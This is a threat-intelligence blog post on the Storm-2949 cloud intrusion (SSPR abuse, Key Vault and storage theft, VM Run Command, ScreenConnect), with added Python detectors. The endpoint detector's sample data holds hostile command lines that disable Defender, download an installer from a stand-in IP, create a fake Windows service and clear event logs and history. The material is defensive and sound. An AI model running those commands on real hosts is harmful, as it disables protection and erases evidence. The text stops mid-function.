Microsoft Threat Intelligence recently uncovered a methodical, sophisticated, and multi-layered attack in which a threat actor we track as Storm-2949 ran a relentless campaign with a single goal: to exfiltrate as much sensitive data as possible from a target organization's high-value assets. The attack exfiltrated data from Microsoft 365 applications, file-hosting services, and Azure-hosted production environments, where the organization's production application ecosystem resides.
What began as a targeted identity compromise quickly evolved into a full-spectrum attack on the organization's cloud infrastructure. The attack spanned numerous Azure resources, with emphasis on the software-as-a-service (SaaS), platform-as-a-service (PaaS), and infrastructure-as-a-service (IaaS) layers.
Storm-2949 did not rely on traditional malware or other on-premises tactics, techniques, and procedures (TTPs). Instead, they leveraged legitimate cloud and Azure management features to gain control-plane and data-plane access, which they then used to execute code remotely on VMs and to access sensitive cloud resources such as Key Vaults and storage accounts, among others. These actions allowed them to move laterally across cloud and endpoint environments while blending into expected administrative behavior.
As organizations continue to adopt cloud infrastructure at scale, threat actors are increasingly targeting identity and control-plane access rather than individual devices. When cloud identities are compromised, legitimate administrative features can be used to achieve outcomes similar to traditional lateral movement, often with fewer indicators of compromise. Behavior-based detections across endpoints, cloud environments, and identities, such as those provided by Microsoft Defender, can help teams identify and correlate these actions.
In this blog, we unpack the full attack chain from initial access to cloud and endpoint takeover. We then offer actionable insights into how organizations can detect, contain, and prevent similar identity-driven threats in their environments.
Attack chain overview
The campaign that Storm-2949 deployed can be divided into two phases: targeted identity compromise and cloud infrastructure compromise. We discuss each of these phases in detail in the following sections.

Cloud compromise: Microsoft Entra ID and Microsoft 365
In this phase, the threat actor targeted specific users through social engineering to obtain their Microsoft Entra ID credentials. Using these credentials, the threat actor then proceeded to exfiltrate data from Microsoft 365 applications.
Initial access and persistence through targeted social engineering and SSPR abuse
We assess with high confidence that Storm-2949 leveraged a social engineering technique consistent with known abuses of Microsoft's Self-Service Password Reset (SSPR) process. In such attacks, a threat actor initiates the SSPR process on behalf of a targeted user and then uses social engineering tactics to persuade the user to complete multifactor authentication (MFA) prompts that appear legitimate.
For example, the threat actor might impersonate an internal information technology (IT) support representative and contact the user claiming that their account requires urgent verification, instructing them to approve MFA prompts as part of a routine password reset procedure.
Once the user approves these prompts, the threat actor is able to reset the user's password and remove existing authentication methods, such as phone numbers, email addresses, and Microsoft Authenticator registrations, effectively eliminating MFA as a control and enabling unrestricted account access. Immediately after gaining access to the compromised account, the threat actor is prompted to re-enable MFA and register a new authentication method. At this stage, the threat actor enrolls Microsoft Authenticator on their own device, granting themselves persistent access and preventing the legitimate user from signing in.
Storm-2949 used a similar process repeatedly across multiple users within the targeted organization. The selection of victims, which included IT personnel and senior leadership, indicated deliberate targeting. Based on the roles of the compromised users and the investigation findings, we assess that the threat actor likely used an organized and convincing phishing scheme to lure users into completing the fraudulent MFA prompts and thereby compromise their identities.
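As an added example (not part of Microsoft's write-up), the following Python flags the takeover sequence described above in Microsoft Entra ID audit log data: a self-service password reset followed, within a short window, by deletion of the user's existing security info and registration of new security info. The activity names are modelled on the audit log's activityDisplayName values for these operations; the events, user names, and IP addresses are constructed, and the flattened event shape is an assumption made for the example.

```python
"""Detect the SSPR-abuse takeover sequence in Microsoft Entra ID audit events.

Added example (not Microsoft's detection logic). Activity names follow the
Entra ID audit log activityDisplayName values for self-service password reset
and authentication-method changes; the events themselves are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class AuditEvent:
    time: datetime
    activity: str       # activityDisplayName
    target: str         # targetResources[0].userPrincipalName
    ip: str             # initiatedBy.user.ipAddress


RESET = "Reset password (self-service)"
DELETED = "User deleted security info"
REGISTERED = "User registered security info"


def find_sspr_takeovers(events: Iterable[AuditEvent],
                        window_minutes: int = 60) -> List[Dict]:
    """One finding per user whose self-service reset was followed, within the
    window, by removal of existing security info and then registration of new
    security info: the sequence that strips the victim's MFA and enrolls the
    attacker's device."""
    window = timedelta(minutes=window_minutes)
    by_user: Dict[str, List[AuditEvent]] = {}
    for e in sorted(events, key=lambda e: e.time):
        by_user.setdefault(e.target, []).append(e)

    findings = []
    for user, evs in by_user.items():
        for i, reset in enumerate(evs):
            if reset.activity != RESET:
                continue
            later = [e for e in evs[i + 1:] if e.time - reset.time <= window]
            deleted = next((e for e in later if e.activity == DELETED), None)
            if deleted is None:
                continue
            registered = next((e for e in later
                               if e.activity == REGISTERED and e.time >= deleted.time), None)
            if registered is None:
                continue
            findings.append({
                "user": user,
                "reset_at": reset.time,
                "mfa_removed_at": deleted.time,
                "new_method_at": registered.time,
                "new_method_ip": registered.ip,
                # A new method registered from an address the reset did not come
                # from is the strongest sign the enrolling device is not the victim's.
                "ip_changed": registered.ip != reset.ip,
            })
            break  # one finding per user is enough to trigger review
    return findings


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample: alice shows the full takeover chain; bob did a routine
# self-service reset and added a method the next day; carol changed methods
# with no reset at all.
SAMPLE_EVENTS = [
    AuditEvent(_t("2025-01-10T09:00:00"), RESET, "alice@contoso.com", "198.51.100.20"),
    AuditEvent(_t("2025-01-10T09:03:00"), DELETED, "alice@contoso.com", "203.0.113.10"),
    AuditEvent(_t("2025-01-10T09:05:00"), REGISTERED, "alice@contoso.com", "203.0.113.10"),
    AuditEvent(_t("2025-01-10T14:00:00"), RESET, "bob@contoso.com", "198.51.100.30"),
    AuditEvent(_t("2025-01-11T08:30:00"), REGISTERED, "bob@contoso.com", "198.51.100.30"),
    AuditEvent(_t("2025-01-10T16:00:00"), DELETED, "carol@contoso.com", "198.51.100.40"),
    AuditEvent(_t("2025-01-10T16:02:00"), REGISTERED, "carol@contoso.com", "198.51.100.40"),
]

if __name__ == "__main__":
    for finding in find_sspr_takeovers(SAMPLE_EVENTS):
        print(finding)
```

The window is the tunable part: in the intrusion described here the three steps happened within minutes, so a tight window keeps routine help-desk resets (reset today, new phone registered next week) out of the result set, while the ip_changed flag separates a user re-registering their own device from an attacker enrolling theirs.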
Directory discovery and persistence
Following the initial identity takeover, the threat actor performed directory discovery using the Microsoft Graph API. Using a custom Python script, they issued automated API requests to enumerate users and applications within the tenant. Through these queries, the threat actor searched Microsoft Entra ID for user accounts based on name patterns and role attributes, likely to identify privileged identities and additional high-value targets.
Figure 2 illustrates the types of Graph API queries observed:

During this attack phase, the threat actor also attempted to establish persistence by adding credentials to a compromised service principal to enable continued access independent of the compromised user accounts. This attempt failed due to insufficient permissions. Undeterred, the threat actor continued enumerating service principals and known application identifiers, indicating an effort to map application-level access paths and expand long-term footholds within the environment.
Using the same social engineering techniques and SSPR abuse described earlier, the threat actor expanded their foothold by compromising three additional cloud user accounts.
Microsoft 365 discovery and exfiltration
Storm-2949 leveraged their access to the compromised user accounts to explore and exfiltrate data from the victim organization's cloud file storage services. Shortly after obtaining initial access within the organization, they targeted Microsoft 365 applications, including OneDrive and SharePoint, identifying and accessing the organization's sensitive data, with a focus on IT documents related to virtual private network (VPN) configurations and remote access procedures. We assess that this behavior reflects an attempt to identify opportunities for lateral movement from a compromised cloud identity into the endpoint network.
The threat actor then launched a large-scale data exfiltration from these storage services. In one instance, Storm-2949 used the OneDrive web interface to download thousands of files in a single action to their own infrastructure. This pattern of data theft was repeated across all compromised user accounts, likely because different identities had access to different folders and shared directories.
Cloud compromise: Microsoft Azure
Armed with access to several compromised identities, which had been assigned privileged custom Azure role-based access control (RBAC) roles on several Azure subscriptions, and with a growing understanding of the environment, the threat actor shifted focus toward the victim's Azure environment. With a clear agenda centered on data exfiltration, Storm-2949 demonstrated a relentless drive to uncover and extract the most sensitive assets within the victim's Azure environment, specifically from production Azure subscriptions.
Their campaign targeted not only core applications but also the broader ecosystem of interconnected resources such as Azure App Service web applications, Azure Key Vaults, Azure Storage accounts, and SQL databases. These resources collectively power the organization's cloud-hosted services. This phase marked a transition from identity-centric abuse and SaaS data theft to targeting a wide range of Azure services, with an emphasis on both PaaS and IaaS workloads.
Azure App Service and Key Vault compromise
One of Storm-2949's main targets was a production Azure App Service web application that contained sensitive data. Following several failed attempts to access this application, likely due to gateway and network restrictions, Storm-2949 shifted focus to other web apps that appeared to be part of the same ecosystem. These auxiliary apps, such as those handling authentication or internal APIs, were separately deployed Azure App Service instances with their own resource identities.
Storm-2949 successfully compromised several of these secondary web apps by taking advantage of the user's privileged Azure RBAC permissions and invoking the Azure management-plane operation Microsoft.Web/sites/publishxml/action, which retrieves the application's publishing profile. This profile often contains basic authentication credentials for deployment endpoints such as FTP, Web Deploy, and the Kudu management console. Kudu is a built-in administrative interface for Azure App Service that lets authenticated users browse the file system, inspect environment variables, and execute commands within the app's context.
Despite successfully compromising several of these auxiliary web apps, Storm-2949 was unable to gain access to the primary production application they were ultimately targeting. We assess that the secondary services, while part of the same broader ecosystem, did not contain the level of sensitive data or privileged access the threat actor was seeking. While these footholds provided visibility into application configurations and infrastructure, they did not deliver the high-value assets that aligned with the threat actor's data exfiltration objectives. As a result, the threat actor was forced to pursue alternative paths in their effort to reach the production web app.
Storm-2949 recalibrated their approach and shifted focus toward backend resources that were part of the sensitive web app ecosystem and could provide stronger leverage. The threat actor pivoted to the organization's Azure Key Vault assets, a place more likely to centralize sensitive secrets and provide indirect access to production systems. Among the compromised user's Azure RBAC permissions was the privileged Owner role over a specific Key Vault that appeared to contain credentials that would enable the compromise of the production application.
Over the span of four minutes, the threat actor successfully manipulated Key Vault access configurations and accessed dozens of secrets within that Key Vault. These secrets included database connection strings, identity credentials, and more, dramatically expanding the attack's blast radius.
Among these secrets, we believe the threat actor found credentials that enabled them to access the application they coveted the most: the main production web app. After they successfully authenticated to the web app, the threat actor changed its password to retain control. They then began exfiltrating sensitive data from it.
Azure Storage and SQL data exfiltration
In parallel, Storm-2949 expanded access across additional cloud resources inside the ecosystem that contained the web app, including Azure Storage accounts and an Azure SQL server.
To enable access to the server, the threat actor abused their existing Azure RBAC permissions to manipulate the SQL server firewall rules using the Microsoft.Sql/servers/firewallRules/write operation. They then connected to the SQL server using the credentials they had obtained (along with the web app credentials) from the compromised Key Vault.
The threat actor proceeded with data exfiltration and then deleted the modified SQL firewall rules, an activity consistent with defense evasion.
As with the SQL server compromise, to prepare for massive data exfiltration from Azure Storage, the threat actor also manipulated storage account network access configurations using the Microsoft.Storage/storageAccounts/write operation. This manipulation enabled public access to the storage accounts from a closed set of threat actor-owned IP addresses. In addition, the threat actor abused the Azure management-plane operation Microsoft.Storage/storageAccounts/listKeys/action to access several storage account Shared Access Signature (SAS) tokens and account keys, enabling the use of static, non-interactive authentication to retrieve data.
Using these keys, the threat actor downloaded large volumes of data from several Azure Storage accounts using a custom Python script that leveraged the Azure SDK for Storage. The script allowed them to programmatically enumerate and download blobs directly to their own endpoint device. This storage-based exfiltration continued over several days after the initial access, with the threat actor alternating between secret- and OAuth-based authentication as access conditions and controls evolved.
Azure Virtual Machines compromise
Apart from the web app and data-store resource compromise, the abuse of Azure Virtual Machine (VM) extensions and administrative features, specifically Run Command and the VMAccess extension, was also a prominent component of this attack. These actions appear to have been primarily intended to extend operational access within the victim environment by leveraging compromised VMs as intermediary footholds. Observed activity across these systems focused on credential harvesting and environment discovery, as well as attempts to access resources that were not directly reachable through previously compromised identities. These efforts included domain reconnaissance and the collection of authentication material that could facilitate movement between cloud and on-premises environments, as well as enable access to additional high-value assets.
Shortly after the initial access, the threat actor operated in parallel, trying to compromise the organization's virtual machines. Using the compromised users assigned privileged Azure RBAC permissions, the threat actor deployed the VMAccess extension to create a new local administrator account on a targeted VM. VMAccess is an Azure VM extension intended to help administrators restore access to a VM when credentials are lost or misconfigured, by allowing password resets or the addition of privileged local users through the Azure management plane. In this case, the threat actor abused the extension to gain backdoor access to an administrator user on the VM.
Using the Run Command feature, the threat actor deployed a script attempting to abuse the VM's managed identity by requesting an access token from the Azure Instance Metadata Service (IMDS) and using it to authenticate to, and retrieve secrets from, the Key Vault related to the production web app. However, the threat actor was not able to retrieve the secrets because the managed identity lacked the required permissions. Still, this attempt shows the threat actor using guest-level execution as a bridge to additional Azure resource access through workload identity.
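The operations named in the App Service, Key Vault, SQL, Storage, and VM passages above all leave management-plane (Activity Log) or Key Vault data-plane (diagnostic log) records. The following added example, not Microsoft's detection logic, runs a small rule set over constructed records of that kind: one finding per sensitive operation, the SQL firewall-rule write followed by a delete from the same caller, and a burst of SecretGet reads against one vault. The operation names are the real Azure resource-provider strings; the record shape, callers, and resource names are assumptions made for the example.

```python
"""Flag the Azure management-plane operations and the Key Vault data-plane
pattern abused in this intrusion, over activity-log style records.

Added example, not Microsoft's detection logic. Operation names are the real
Azure resource-provider operation strings; the records are constructed and use
a simplified shape (time, op, caller, resource) rather than the full
Activity Log / Key Vault diagnostic schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# One finding per occurrence of these operations; outside deployment pipelines
# they are rare enough for a user principal to review individually.
SINGLE_OP_RULES = {
    "microsoft.web/sites/publishxml/action": "app-service-publish-profile-read",
    "microsoft.keyvault/vaults/write": "keyvault-config-write",
    "microsoft.storage/storageaccounts/write": "storage-account-config-write",
    "microsoft.storage/storageaccounts/listkeys/action": "storage-account-keys-listed",
    "microsoft.sql/servers/firewallrules/write": "sql-firewall-rule-written",
    "microsoft.compute/virtualmachines/extensions/write": "vm-extension-deployed",
    "microsoft.compute/virtualmachines/runcommand/action": "vm-run-command",
}
SQL_FW_WRITE = "microsoft.sql/servers/firewallrules/write"
SQL_FW_DELETE = "microsoft.sql/servers/firewallrules/delete"
KV_SECRET_GET = "secretget"   # Key Vault diagnostic-log OperationName for a secret read

Finding = Tuple[str, str, str, datetime]   # rule, caller, resource, time


def detect(events: List[Dict], fw_window_hours: int = 2,
           burst_minutes: int = 5, burst_threshold: int = 10) -> List[Finding]:
    events = sorted(events, key=lambda e: e["time"])
    findings: List[Finding] = []

    for e in events:
        rule = SINGLE_OP_RULES.get(e["op"].lower())
        if rule:
            findings.append((rule, e["caller"], e["resource"], e["time"]))

    # Firewall rule written and later deleted by the same caller on the same
    # server: the open-exfiltrate-close pattern described for the SQL server.
    fw_window = timedelta(hours=fw_window_hours)
    deletes = [e for e in events if e["op"].lower() == SQL_FW_DELETE]
    for w in (e for e in events if e["op"].lower() == SQL_FW_WRITE):
        for d in deletes:
            if (d["resource"], d["caller"]) == (w["resource"], w["caller"]) \
                    and timedelta(0) <= d["time"] - w["time"] <= fw_window:
                findings.append(("sql-firewall-opened-then-removed", w["caller"], w["resource"], d["time"]))
                break

    # Many SecretGet operations by one caller against one vault inside a short
    # window: the dozens-of-secrets-in-four-minutes behaviour.
    burst = timedelta(minutes=burst_minutes)
    reads: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for e in events:
        if e["op"].lower() == KV_SECRET_GET:
            reads[(e["caller"], e["resource"])].append(e["time"])
    for (caller, vault), times in reads.items():
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > burst:
                start += 1
            if end - start + 1 >= burst_threshold:
                findings.append(("keyvault-secret-read-burst", caller, vault, times[end]))
                break
    return findings


def _ev(time: str, op: str, caller: str, resource: str) -> Dict:
    return {"time": datetime.fromisoformat(time), "op": op, "caller": caller, "resource": resource}


# Constructed records: ops@contoso.com is the compromised identity walking the
# chain from the text; dev@contoso.com and the app's managed identity are benign noise.
SAMPLE_EVENTS = (
    [
        _ev("2025-01-10T09:05:00", "Microsoft.Web/sites/read", "dev@contoso.com", "/sites/auth-api"),
        _ev("2025-01-10T10:00:00", "Microsoft.Web/sites/publishxml/action", "ops@contoso.com", "/sites/auth-api"),
        _ev("2025-01-10T10:20:00", "Microsoft.KeyVault/vaults/write", "ops@contoso.com", "/vaults/prod-kv"),
    ]
    + [_ev(f"2025-01-10T10:21:{s:02d}", "SecretGet", "ops@contoso.com", "/vaults/prod-kv") for s in range(0, 60, 5)]
    + [_ev(f"2025-01-10T11:00:{s:02d}", "SecretGet", "app-identity", "/vaults/prod-kv") for s in (0, 10, 20)]
    + [
        _ev("2025-01-10T11:30:00", "Microsoft.Sql/servers/firewallRules/write", "ops@contoso.com", "/servers/prod-sql"),
        _ev("2025-01-10T12:10:00", "Microsoft.Sql/servers/firewallRules/delete", "ops@contoso.com", "/servers/prod-sql"),
        _ev("2025-01-10T12:15:00", "Microsoft.Storage/storageAccounts/write", "ops@contoso.com", "/storageAccounts/prodfiles"),
        _ev("2025-01-10T12:16:00", "Microsoft.Storage/storageAccounts/listKeys/action", "ops@contoso.com", "/storageAccounts/prodfiles"),
        _ev("2025-01-10T13:00:00", "Microsoft.Compute/virtualMachines/extensions/write", "ops@contoso.com", "/virtualMachines/vm01"),
        _ev("2025-01-10T13:05:00", "Microsoft.Compute/virtualMachines/runCommand/action", "ops@contoso.com", "/virtualMachines/vm01"),
    ]
)

if __name__ == "__main__":
    for rule, caller, resource, when in detect(SAMPLE_EVENTS):
        print(f"{when:%H:%M:%S} {rule:35} {caller:18} {resource}")
```

The single-operation rules are deliberately noisy on their own; the value is in the sequence and burst rules and in grouping everything by caller, which is what turns nine separate records into one story about one identity. The same grouping is what the CloudAuditEvents table in advanced hunting lets you do across subscriptions.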

ScreenConnect installation and defense evasion
Storm-2949 further abused Run Command by running a PowerShell script intended to deploy persistent remote access while reducing host-based security visibility on several VMs.
The script attempted to weaken Microsoft Defender Antivirus by disabling several protections, including real-time protection and behavior monitoring, and by interfering with its associated service. These changes reduced the likelihood that subsequent activity would be blocked or would generate actionable alerts on the device.
The script then installed the ScreenConnect remote monitoring and management (RMM) tool, obtained from threat actor-controlled infrastructure. The installation process included several steps intended to mask the tool's presence, such as making the network request appear consistent with trusted software updates and placing files in locations intended to resemble legitimate system content.
To further obscure the tool's presence, the script attempted to rename or configure the installed service to resemble legitimate Windows components, providing a simple form of local masquerading.
Finally, the script attempted cleanup actions to remove local forensic artifacts that could be attributed to the threat actor. These included clearing Windows event logs, removing execution artifacts, and deleting command history and temporary files. Such steps are commonly observed in post-compromise activity and are generally intended to complicate investigation rather than provide strong evasion.
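As an added example (not Microsoft's detection content), the following Python classifies process command lines for the behaviors described in this section: Set-MpPreference with a -Disable* switch turned on, stopping the Defender service, clearing event logs, deleting PowerShell history, referencing the ScreenConnect installer, and creating a Windows-looking service whose binary lives outside the Windows and Program Files trees. The command lines, device names, download URL, and paths are all constructed.

```python
"""Classify endpoint command lines for the tampering, masquerading and cleanup
steps described above.

Added example, not Microsoft's detection logic. Records use a simplified
(device, command line) shape rather than the DeviceProcessEvents schema, and
every command line below is constructed.
"""
import re
from typing import Dict, List, Tuple

RULES = [
    # Set-MpPreference with any -Disable* switch turned on (real-time, behaviour
    # monitoring, IOAV, ...). '$false' and plain Get-MpPreference queries do not match.
    ("defender-protection-disabled",
     re.compile(r"Set-MpPreference\b.*?-Disable\w+\s+(?:\$?true|1)\b", re.I)),
    ("defender-service-tampered",
     re.compile(r"(?:sc(?:\.exe)?\s+(?:stop|config|delete)\s+WinDefend\b|Stop-Service\b.*?\bWinDefend\b)", re.I)),
    ("event-log-cleared",
     re.compile(r"(?:wevtutil(?:\.exe)?\s+(?:cl|clear-log)\b|Clear-EventLog\b)", re.I)),
    ("command-history-removed",
     re.compile(r"ConsoleHost_history\.txt", re.I)),
    ("rmm-artifact-referenced",
     re.compile(r"ScreenConnect|ConnectWise", re.I)),
]

SC_CREATE = re.compile(r'sc(?:\.exe)?\s+create\s+(?P<name>\S+).*?binPath=\s*"?(?P<path>[^"]+)"?', re.I)
NEW_SERVICE = re.compile(r'New-Service\b.*?-Name\s+"?(?P<name>[^"\s]+)"?.*?-BinaryPathName\s+"?(?P<path>[^"]+)"?', re.I)
LOOKALIKE = re.compile(r"windows|microsoft|update|defender", re.I)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")


def masquerading_service(cmd: str) -> bool:
    """A new service whose name imitates a Windows component but whose binary
    lives outside the Windows or Program Files trees."""
    for rx in (SC_CREATE, NEW_SERVICE):
        m = rx.search(cmd)
        if m:
            path = m.group("path").strip().lower()
            return bool(LOOKALIKE.search(m.group("name"))) and not path.startswith(TRUSTED_DIRS)
    return False


def classify(cmd: str) -> List[str]:
    tags = [tag for tag, rx in RULES if rx.search(cmd)]
    if masquerading_service(cmd):
        tags.append("masquerading-service")
    return tags


def scan(records: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    return [(r["device"], tag, r["cmd"]) for r in records for tag in classify(r["cmd"])]


# Constructed command lines: vm01 carries the script's steps, vm02 is benign noise.
SAMPLE_RECORDS = [
    {"device": "vm01", "cmd": r'powershell.exe -NoProfile -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true"'},
    {"device": "vm01", "cmd": r'sc.exe stop WinDefend'},
    {"device": "vm01", "cmd": r'powershell.exe -Command "Invoke-WebRequest -Uri https://203.0.113.77/update/WindowsUpdate.exe -OutFile C:\ProgramData\WinUpdate\ScreenConnect.ClientSetup.msi"'},
    {"device": "vm01", "cmd": r'sc.exe create WindowsUpdateHelper binPath= "C:\ProgramData\WinUpdate\ScreenConnect.ClientService.exe" DisplayName= "Windows Update Helper"'},
    {"device": "vm01", "cmd": r'wevtutil.exe cl Security'},
    {"device": "vm01", "cmd": r'powershell.exe -Command "Remove-Item $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -Force"'},
    # benign: querying settings, re-enabling protection, a vendor service under Program Files
    {"device": "vm02", "cmd": r'powershell.exe -Command "Get-MpPreference"'},
    {"device": "vm02", "cmd": r'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $false"'},
    {"device": "vm02", "cmd": r'sc.exe create WindowsAgentSvc binPath= "C:\Program Files\Vendor\agent.exe"'},
]

if __name__ == "__main__":
    for device, tag, cmd in scan(SAMPLE_RECORDS):
        print(f"{device} {tag:30} {cmd[:70]}")
```

Any one of these tags fires on legitimate administration now and then; several of them on the same host within a few minutes, launched through an Azure VM extension rather than an interactive session, is the combination worth paging on. Tamper protection keeps the first rule from mattering at all, which is why it leads the endpoint recommendations below.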
Post-compromise activity using ScreenConnect
The threat actor used the deployed ScreenConnect to launch commands across several compromised devices, performing basic discovery. This included collecting host-level details (for example, operating system and configuration information) and enumerating domain context such as user accounts and group memberships.
Across a subset of these hosts, the threat actor focused on credential harvesting techniques. They discovered and exfiltrated .pfx certificate files, artifacts that can contain private keys and could be valuable for follow-on access if imported or reused elsewhere. In parallel, they searched remote file shares for likely credential exposure by scanning files for password-related strings. Not every collection effort occurred on every host; rather, it was distributed across systems based on what data and access each host provided.
These actions show ScreenConnect being used as a practical execution channel to run discovery, collect credentials, and attempt to operationalize access across different devices.
While the threat actor ultimately established execution on several endpoints, these systems did not appear to yield high-value data aligned with their objectives. The endpoint activity primarily served as a secondary capability for discovery and credential harvesting, rather than as a core exfiltration channel.
Throughout this incident, Microsoft Defender generated several alerts that helped analysts piece together activity across endpoints and cloud. Defender correlated these signals into unified incidents, surfacing high-fidelity alerts and a coherent view of threat actor activity. This kind of cross-domain correlation, collecting and normalizing telemetry and linking related alerts, illustrates the value of an integrated detection and response approach for improving signal-to-noise clarity and end-to-end visibility.
Mitigation and protection guidance
The visibility provided by correlated alerts across identities, cloud, and endpoints can help organizations investigate and understand attacks end-to-end. Building on this visibility, organizations can reduce risk and limit the impact of similar attacks by deploying appropriately scoped detection and response capabilities (including Microsoft Defender where applicable) and by applying targeted hardening practices.
Ensure adequate security coverage across attack surfaces
To effectively detect and respond to attacks that span identity, cloud, and endpoint environments, organizations should ensure they have monitoring, detection, and response capabilities deployed and properly configured across these surfaces. The following examples describe how Microsoft Defender capabilities can be used to help with this; equivalent controls might be available in other security solutions.
Use Microsoft Defender for Endpoint for:
- Tamper protection enabled to prevent threat actors from stopping security services such as Defender for Endpoint, which can help prevent hybrid cloud environment attacks.
- Endpoint detection and response (EDR) in block mode so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn't detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
- Investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to help remediate them, significantly reducing alert volume.
Use Microsoft Defender for Cloud to protect your cloud resources and assets from malicious activity, both in posture management (Microsoft Defender Cloud Security Posture Management) and in threat detection capabilities. Enable workload protection capabilities across cloud resources, including:
In addition, leverage Microsoft Defender XDR to hunt for threats across cloud environments and resources with advanced hunting. Security teams can proactively investigate threat actor activity by querying telemetry across multiple domains using tables such as CloudAuditEvents, CloudStorageAggregatedEvents, and others, enabling deep visibility into control-plane and data-plane operations, authentication events, and cross-service attack patterns.
Use Microsoft Defender for Cloud Apps and enable connectors to monitor SaaS activity.
Security hardening and best practices
In addition to deploying the appropriate Defender capabilities, organizations should apply the following security controls and practices to mitigate similar attack paths:
Identity protection
- Secure accounts with credential hygiene. Practice the principle of least privilege and audit privileged account activity in your Microsoft Entra ID and Azure environments to slow or stop threat actors.
- Enable Conditional Access policies. Conditional Access policies are evaluated and enforced every time the user attempts to sign in. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.
- Ensure MFA is required for all users. Adding additional authentication methods, such as the Microsoft Authenticator app or a phone number, increases the level of protection if one factor is compromised.
- Ensure phishing-resistant MFA strength is required for administrators and privileged user accounts.
- Ensure all existing privileged users have an already registered MFA method, to protect against malicious MFA registrations.
- Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
- Refer to Azure Identity Management and access control security best practices for additional steps and recommendations to manage, design, and secure your cloud environment.
- Turn on Microsoft Entra ID Protection to monitor identity-based risks and create risk-based Conditional Access policies to remediate risky sign-ins.
Cloud resource protection
- Use the Azure Monitor activity log to investigate and monitor Azure management events.
- Configure and harden resource firewall rules and access controls to allow access only from trusted IP ranges and virtual networks to prevent unauthorized access.
- Use Azure Policy to continuously enforce the hardened configurations.
- Follow and apply Azure Storage security best practices:
  - Use Azure Policy for Azure Storage to prevent network and security misconfigurations and maximize the protection of enterprise data stored in your storage accounts.
  - Implement Azure Blob Storage security recommendations for enhanced data protection.
  - Use the features available for data protection in Azure Storage.
  - Enable immutable storage for Azure Blob Storage to protect against accidental or malicious modification or deletion of blobs or storage accounts.
  - Enable Azure Monitor for Azure Blob Storage to collect, aggregate, and log data so that activity trails can be reconstructed for investigation when a security incident occurs or the network is compromised.
  - Use private endpoints for Azure Storage account access and disable public network access for increased security.
  - Avoid using anonymous read access for blob data.
  - Enable Azure blob backup to protect against accidental or malicious deletion of blobs or storage accounts.
  - Apply the principle of least privilege when authorizing access to blob data in Azure Storage using Microsoft Entra and RBAC, and configure fine-grained Azure Blob Storage access for sensitive data through Azure attribute-based access control (ABAC).
- Follow and apply Azure Key Vault security best practices:
  - Enable purge protection in Azure Key Vault to prevent immediate, irreversible deletion of vaults and secrets. Use the default retention period of 90 days.
  - Enable logging in Azure Key Vault and retain the logs for up to a year so that activity trails can be reconstructed for investigation when a security incident occurs or the network is compromised.
  - Restrict public network access to Azure Key Vault by enabling private endpoints and disabling public access, reducing exposure to unauthorized access attempts.
  - Regularly audit Azure RBAC role assignments and Key Vault access policies, depending on the Key Vault permission model, to ensure least privilege and detect over-permissioned identities. Microsoft explicitly recommends Azure RBAC over Key Vault access policies.
- Configure SQL server firewall rules to restrict access to known IP addresses, and monitor for unauthorized changes to firewall configurations.
- Enforce authentication via Microsoft Entra ID for SQL instances to reduce reliance on static credentials and improve access control.
- Follow and apply Azure App Service security best practices:
  - Disable legacy (basic) authentication for deployment endpoints and enforce managed identity usage for Azure App Service to prevent credential theft through publishing profiles.
  - Monitor and restrict access to Azure App Service publishing credentials by limiting RBAC permissions and auditing use of the publish profile API.
  - Enable diagnostic logging in App Service to detect suspicious deployment or configuration changes.
- Enable Azure Backup for virtual machines to protect the data in your Azure virtual machines and to create recovery points stored in geo-redundant recovery vaults.
- Audit and restrict the use of Azure VM features and extensions such as Run Command and VMAccess by limiting RBAC permissions and monitoring for suspicious invocation patterns.
- Use Azure Policy to restrict or audit the deployment of Azure VM extensions across your subscriptions.
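To turn the storage, Key Vault, and App Service recommendations above into something checkable, the following added example (not Microsoft tooling) audits resource documents for the settings this intrusion depended on: public network exposure, anonymous blob access, shared-key authorization, Key Vault purge protection and permission model, and basic publishing credentials on the FTP and SCM endpoints. The documents are constructed but use the ARM property names that az resource show returns; treating an absent property as its permissive default is a deliberate choice for the check, not a statement about every resource type's actual default.

```python
"""Posture check for the Azure resource settings this intrusion relied on:
internet-reachable storage, Key Vault and App Service endpoints, shared-key and
basic-auth credentials, Key Vault purge protection and permission model.

Added example, not Microsoft's tooling. The resource documents are constructed
but use the real ARM property names (the shape 'az resource show' returns);
a property that is absent is treated as its permissive value.
"""
from typing import Dict, List


def _internet_reachable(props: Dict) -> bool:
    """Reachable unless public network access is off or the ACL default is Deny."""
    if str(props.get("publicNetworkAccess", "Enabled")).lower() == "disabled":
        return False
    return str(props.get("networkAcls", {}).get("defaultAction", "Allow")).lower() != "deny"


def check_storage(props: Dict) -> List[str]:
    findings = []
    if _internet_reachable(props):
        findings.append("public network access not restricted to trusted networks")
    if props.get("allowBlobPublicAccess", True):
        findings.append("anonymous blob access allowed")
    if props.get("allowSharedKeyAccess", True):
        findings.append("shared-key authorization enabled (listKeys yields usable credentials)")
    return findings


def check_key_vault(props: Dict) -> List[str]:
    findings = []
    if _internet_reachable(props):
        findings.append("public network access not restricted to trusted networks")
    if not props.get("enablePurgeProtection", False):
        findings.append("purge protection disabled")
    if not props.get("enableRbacAuthorization", False):
        findings.append("legacy access-policy permission model in use")
    return findings


def check_app_service(props: Dict, policies: Dict[str, Dict]) -> List[str]:
    """policies: the site's basicPublishingCredentialsPolicies children keyed 'ftp' / 'scm'."""
    findings = []
    if str(props.get("publicNetworkAccess", "Enabled")).lower() != "disabled":
        findings.append("public network access enabled")
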